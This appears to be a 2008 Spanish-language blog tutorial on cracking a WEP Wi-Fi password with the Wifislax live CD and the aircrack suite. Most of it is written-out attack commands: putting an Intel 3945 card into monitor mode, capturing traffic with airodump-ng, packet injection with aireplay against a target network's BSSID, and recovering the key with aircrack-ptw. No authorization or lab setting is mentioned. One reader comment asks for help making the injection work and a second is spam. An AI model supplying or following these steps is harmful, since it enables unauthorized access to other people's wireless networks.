Oct
23
2008

Como descifrar una clave wep wifi con livecd linux

Este truco sólo es posible si tienes una ipw 3945 ABG.

Lo primero que debes hacer es bajar el live cd wifislax 3.1

Para bajar el wifislax 3.1 buscalo en google, es fácil.

Luego de grabarlo, hacer lo siguiente:

1º Cargar el CD con la distribución:

[/lang_en][lang_en]

Metemos el live-cd y luego reiniciamos, fijandose en la bios que el cd este como arranque en primer lugar.

2º Ingresar como root:

user: root

pass: toor

# startx, para cargar el entorno gráfico.

3º En el entorno, activar el adaptador para inyectar:

-Inicio/wifislax/drivers/intel pro wireless/intel pro wireless 3945 inyection

-Carga el script.

Con esto ya tenemos nuestra tarjeta de red en modo monitor.

4º Preparar el adaptador:

Desde la shell:

# ifconfig wifi0 up
# iwconfig wifi0 rate 1M

5º Empezamos a capturar y preparamos el entorno:

Aconsejo abrir 4 o 5 shell para trabajar con comodidad y poner en cada una un trabajo,

En este paso ponemos a capturar datos con este comando:

# airodump-ng -w f --channel (canal) wifi0

Si no especificas en canal, capturaremos información de todos en forma aleatoria.

6º En otra consola empezamos a inyectar:

# aireplay -1 0 -a (BSSID) -e (ESSID) -h (MacNuestro) wifi0

-El Bssid y essid sale durante la captura, copialo desde ahí, y el MacNuestro es el número Mac de nuestra wifi, que se puede ver en:

# ifconfig

Donde sale wifi0 en HWAdress copias los primeros 6 grupos de números del principio, cambia los guiones por : y lo pones en MacNuestro.

7º Inyectamos en serio

Ponemos en otra consola:

# aireplay -3 -b (BSSID) -h (MacNuestro) wifi0

Esperamos de 5 a 10 minutos, si funciona empezará a subir los paquetes muy rápido en la consola de airodump.

8º Desencriptando

Cuando juntamos más de 30000 data, paramos el airodump, hacemos un ls -l y vemos como se llama el fichero .cap que se ha creado. Con ese dato hacemos lo siguiente:

# aircrack-ptw (fichero.cap)

En unos segundos te aparecerá la clave, y ya tienes la clave de la wifi.

Written by simon in: Wifi | Tags:

3 Comments »

  • rodolfo says:

    Hola, muy bueno el tutorial, pero quiero hacerte unas consultas:

    Primero: Estoy siguiendo este tutorial desde Ubuntu 8.04, por lo que comprendo que quizas no tengas la solución a mi problema.

    Segundo: Mi notebook es un sony vaio vgn-nr230fe al realizar el siguiente comando me entrega esto:

    lspci | grep Wireless
    06:00.0 Ethernet controller: Atheros Communications Inc. AR242x 802.11abg Wireless PCI Express Adapter (rev 01)

    por lo que instalé los drives de madwifi. Hasta ahi todo bien, me conecto a internet y puedo pasar a modo monitor sin mayor problema.

    Ahora los pero.

    Pregunta uno: Como saber si tengo bien parchados los drivers mad-wifi??????, yo “creo” que esta todo en orden, ya que para realizar dicho parche he seguido este tutorial: http://foro.seguridadwireless.net/manuales_de_wifislax_wifiway/chipset_atheros_nuevos_drivers_para_modo_monitor_inyeccion_0792008-t15315.0.html

    entonces ahora lo que viene de cajon, es en caso de que no este parchado mi driver como debo hacerlo para que si,ya que he googleado bastante para lograrlo y la información no es muy clara.

    Segunda Pregunta: en el caso hipotetico de que mi driver este funcionando al 100%, he seguido tu tutorial y paso a modo monitor, ejecuto airodump-ng y hasta ahi todo bien, puedo identificar la red a descifrar y todo bien, luego en otra consola ejecuto:

    aireplay -3 -b (BSSID) -h (MacNuestro) ath0

    y aqui esta mi duda porque me arroja esto:

    open(/dev/rtc) failed: Device or resource busy
    09:15:11 Waiting for beacon frame (BSSID: 00:14:A5:91:AC:06)
    Saving ARP requests in replay_arp-1122-091511.cap
    You should also start airodump-ng to capture replies.

    Por lo que entiendo, algo no se esta llevando a cabo o algo pasa y no se porque me dice que deberia tambien iniciar airodump-ng si ya esta eso funcionando en otra consola. Un punto tambien a considerar es que he dejado corriendo el comando airodump-ng por 1 hora y no pasa nada sigue el mismo mensaje.

    El punto es que sin airodump-ng la captura de paquetes se vuelve lenta, y la verdad es que llevo un par de semanas tratando de solucionar esto y nada que nada.

    Tercera pregunta: es con respecto al comando aircrack-ptw (fichero.cap), al parecer o creo (por lo que he leido) que ese comando es una version mejorada de aircrack-ng, y no se como se instala, a lo que me refiero es ¿¿¿¿¿¿que debo hacer, borrar el aircrack que tengo instalado (que lo instale desde repositorios) e intalar el aircrack-ptw a mano ??????.

    Bueno, esas serian mis dudas, un poco extensas, pero hasta el momento este es el mejor tutorial que he encontrado, por lo que me decidí a llevarlo a cabo. espero que puedas responder mis dudas o que me puedas guiar a una solución.

    Gracias. se despide rodolfo. y sigue asi.

    chao

  • Karina Kines says:

    Hello, what a good information in your blog listed here The public is the solid foundation for charity Regards, Verna Vukich

RSS feed for comments on this post. TrackBack URL


Leave a Reply

%d bloggers like this: